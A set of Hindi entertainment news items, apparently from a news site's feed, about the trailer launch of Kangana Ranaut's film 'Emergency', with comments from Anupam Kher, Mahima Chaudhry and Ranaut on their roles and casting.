ज़ी स्टूडियोज़ और मणिकर्णिका फ़िल्म्स द्वारा निर्मित फ़िल्म इमरजेंसी का संगीत संचित बलहारा ने तैयार किया है, जबकि पटकथा और संवाद रितेश शाह ने लिखे हैं। फिल्म 'इमरजेंसी' में कंगना रनौत, अनुपम खेर, महिमा चौधरी, मिलिंद सोमन, श्रेयस तलपड़े, विशाक नायर और दिवंगत सतीश कौशिक प्रमुख भूमिकाओं में हैं। कंगना रनौत निर्मित-निर्देशित इमरजेंसी 06 सितंबर 2024 को सिनेमाघरों में रिलीज़ होगी।

कंगना से हर कोई इंस्पीरेशन ले सकता है: अनुपम खेर

 बॉलीवुड के जानेमाने चरित्र अभिनेता अनुपम खेर का कहना है कि कंगना रनौत से हर कोई इंस्पीरेशन ले सकता है। कंगना रनौत की आने वाली फिल्म इमरजेंसी का ट्रेलर हाल ही में लांच किया गया है। कंगना रनौत ने फिल्म इमरजेंसी में न सिर्फ अभिनय किया है बल्कि फिल्म का निर्माण और निर्देशन भी किया है। फिल्म 'इमरजेंसी' में कंगना रनौत के अलावा अनुपम खेर, महिमा चौधरी, मिलिंद सोमन, श्रेयस तलपड़े, विशाक नायर और दिवंगत सतीश कौशिक भी प्रमुख भूमिकाओं में हैं। अनुपम खेर ने फिल्म इमरजेंसी में लोकनायक जय प्रकाश नारायण की भूमिका निभायी है।

इमरजेंसी के ट्रेलर लांच पर अनुपम खेर ने कहा, कंगना रनौत से हर कोई इंस्पीरेशन ले सकता है। कंगना एक सच्ची इंस्पीरेशन हैं। जब देश में इमरजेंसी लागू हुयी थी तब मैं अपने ड्रामा स्कूल के पहले साल में था। मैं उस समय दिल्ली में था। मैं पॉलटिकली अवेयर नहीं था। आर्ट सर्किल से जुड़ा हुआ था। मैं इस बात को लेकर खुश था कि मेरा एडमिशन ड्रामा स्कूल में हो गया। जब इमरजेंसी लागू हुयी तो साइलेंस सा छा गया। जय प्रकाश नारायाण यूथ के होप थे। नेशन की होप थे। इमरजेंसी के खिलाफ लड़ने के लिये जयप्रकाश नारायण उम्मीद थे। जय प्रकाश मेरे हीरो थे। जब कंगना ने मुझे इमरजेंसी में जय प्रकाश नारायण का किरदार निभाने के लिये नरेट किया तो मैं बहुत खुश हुआ। कंगना ने मुझे लिटरेचर दिया, जिसे मैंन पढ़ा। जिस तरह कंगना ने इमरजेंसी बनायी है वह अमेजिंग है।

अनुपम खेर ने कहा, जैसे जैसे जिंदगी आगे बढ़ती है तो हम अपने हीरो को भूलते जाते हैं। मैं अपने आप को भायशाली मानता हूं कि मुझे इमरजेंसी में जय प्रकाश नारायण का किरदार निभाने का अवसर मिला है। जब हम सभी कलाकार किसी फिल्म में काम करते हैं तो पहले दिन हीं तय कर लेते हैं कि निर्देशक की सुननी है की नहीं। इमरजेंसी के लिये सभी कलाकारों ने कंगना की सुनी। मुझे लगता है कि जब फिल्म इमरजेंसी रिलीज होगी तो कई सारे कलाकार कंगना के साथ काम करना चाहेंगे। कंगना ने काफी शानदार फिल्म बनायी है। मैंने इमरजेंसी के लिये कंगना के साथ काम करना शुरू कर दिया था। सतीश कौशिक की शूटिंग से पहले। सतीश जी ने जब शूट किया तो उन्होंने शाम को फोन कर कहा, कंगना कमाल की डायरेक्टर है। हम नेशनल स्कूल ऑफ ड्रामा से हैं, हमनें इतनी सारी फिल्में कर चुके हैं, कंगना माइंडब्लोंइग हैं। सतीश जी इमरजेंसी के लिये बेहद उत्साहित थे।

ज़ी स्टूडियोज़ और मणिकर्णिका फ़िल्म्स द्वारा निर्मित फ़िल्म इमरजेंसी का संगीत संचित बलहारा ने तैयार किया है, जबकि पटकथा और संवाद रितेश शाह ने लिखे हैं। यह फ़िल्म 06 सितंबर 2024 को सिनेमाघरों में रिलीज़ होगी।

इमरजेंसी के जरिये आठ साल बाद सिनेमा में वापसी करेंगी महिमा चौधरी

बॉलीवुड की जानीमानी अभिनेत्री महिमा चौधरी फिल्म इमरजेंसी के जरिये आठ साल बाद सिनेमा में वापसी करने जा रही हैं। फिल्म 'इमरजेंसी' में कंगना रनौत, अनुपम खेर, महिमा चौधरी, मिलिंद सोमन, श्रेयस तलपड़े, विशाक नायर और दिवंगत सतीश कौशिक भी प्रमुख भूमिकाओं में हैं। महिमा चौधरी इमरजेंसी के जरिये आठ साल बाद सिनेमा में वापसी करने जा रही हैं। महिमा ने फिल्म इमरजेंसी में पुपुल जयकर का किरदार निभाया है। पुपुल जयकर एक लेखिका थीं और श्रीमती इंदिरा गांधी की बहुत करीबी दोस्त थी। उन्होंने श्रीमती इंदिरा गांधी की आत्मकथा भी लिखी हैं।

इमरजेंसी के ट्रेलर लांच पर महिमा चौधरी ने कहा, मैंने हमेशा कंगना को एक बहुत ही प्रतिभाशाली अभिनेत्री पाया है। मैंने उनके सिनेमा का आनंद लिया है। इमरजेंसी में कंगना सिर्फ निर्देशक नहीं है, वह निर्माता भी थी जो मुख्य भूमिका भी निभा रही थी। कंगना, श्रीमती गांधी जैसी शख्सियत का मुख्य किरदार निभा रही थी, जो देश और दुनिया भर में इतनी अच्छी तरह से जानी जाती हैं। बहुत से लोगों ने श्रीमती गांधी का किरदार निभाया है, लेकिन जिस तरह से कंगना ने इसे निभाया वह काबिले तारीफ है। कंगना ने अपने लुक, अपने हाव-भाव, अपनी आवाज पर जो काम किया है वह अद्भुत है। यह श्रीमती गांधी के सर्वश्रेष्ठ चित्रणों में से एक है। मैं श्रीमती गांधी की प्रशंसक हूं। क्योंकि अमेरिका अभी भी एक महिला नेता चाहता है लेकिन हमारे पास बहुत पहले से इंदिरा गांधी जैसी महिला थी। इंदिरा जी ने बहुत सारी अच्छी चीजें की लेकिन उन्होंने इमरजेंसी जैसी गलतियां भी कीं। इमरजेंसी की कहानी को बताना महत्वपूर्ण था।

इमरजेंसी में महिमा चौधरी को कास्ट करने संबंधी सवाल के जवाब में कंगना रनौत ने कहा, यदि आप मेरी फिल्म के कलाकारों की सूची देखें तो हर व्यक्ति वास्तविक लोगों के बहुत करीब है, आप देख सकते हैं कि पुपल जयकर का श्रीमती गांधी के जीवन पर बहुत गहरा प्रभाव था, इतना कि वह एक बहन की तरह, एक गुरु की तरह, वह श्रीमती गांधी की साथी की तरह थीं और वह एक अत्यधिक बौद्धिक महिला थी। वह संस्कृति और कला के संरक्षण में लगी थी। मैं पुपुल जयकर के लिये ऐसे कलाकार की तलाश में थी, जिसका चेहरा बहुत दयालु और बहुत मातृत्वपूर्ण हो। मैंने महिमा जी से बात की और फिर हमने कुछ परीक्षण किए और आप यह देखकर चौंक जाएंगे कि उन्होंने पुपल जयकर को कितनी खूबसूरती से चित्रित किया है। आप चेहरे से कभी मेल नहीं खा सकते हैं लेकिन आपको भावना से मेल खाना चाहिए और यही हमने किया, हमने हमेशा भावना पर काम किया।

ज़ी स्टूडियोज़ और मणिकर्णिका फ़िल्म्स द्वारा निर्मित फ़िल्म इमरजेंसी का संगीत संचित बलहारा ने तैयार किया है, जबकि पटकथा और संवाद रितेश शाह ने लिखे हैं। कंगना रनौत निर्मित-निर्देशित फ़िल्म इमरजेंसी 06 सितंबर 2024 को सिनेमाघरों में रिलीज़ होगी।

 

 

]]>
कंगना रनौत की फिल्म इमरजेंसी का ट्रेलर 14 अगस्त को होगा रिलीज https://pratyushaashakinayikiran.com/?p=60107 Tue, 13 Aug 2024 14:46:00 +0000 https://pratyushaashakinayikiran.com/?p=60107 मुंबई
बॉलीवुड अभिनेत्री कंगना रनौत की आने वाली फिल्म इमरजेंसी का ट्रेलर 14 अगस्त को रिलीज होगा। ज़ी स्टूडियोज़ और मणिकर्णिका फ़िल्म्स द्वारा निर्मित, 'इमरजेंसी' पहली महिला प्रधानमंत्री श्रीमती इंदिरा गांधी पर आधारित फिल्म है। इस फिल्म में कंगना, इंदिरा गांधी के किरदार में नजर आयेंगी।

कंगना ने इंस्टाग्राम पर फिल्म इमरजेंसी का पोस्टर साझा करते हुए, कैप्शन के साथ ट्रेलर रिलीज़ की तारीख की घोषणा की। उन्होंने लिखा, लोकतांत्रिक भारतीय इतिहास के सबसे काले दौर और सत्ता की लालसा को देखें जिसने देश को लगभग जलाकर राख कर दिया!इमरजेंसी का ट्रेलर 14 अगस्त को रिलीज़ होगा।भारतीय लोकतंत्र के सबसे काले अध्याय की विस्फोटक गाथा #इमरजेंसी 06 सितंबर को दुनिया भर के सिनेमाघरों में दिखाई जाएगी।

फिल्म ‘इमरजेंसी’ में कंगना के अलावा अनुपम खेर, महिमा चौधरी, मिलिंद सोमन, श्रेयस तलपड़े, विशाक नायर और दिवंगत सतीश कौशिक भी प्रमुख भूमिकाओं में हैं।फ़िल्म इमरजेंसी का संगीत संचित बलहारा ने तैयार किया है, जबकि पटकथा और संवाद रितेश शाह ने लिखे हैं।

 

]]>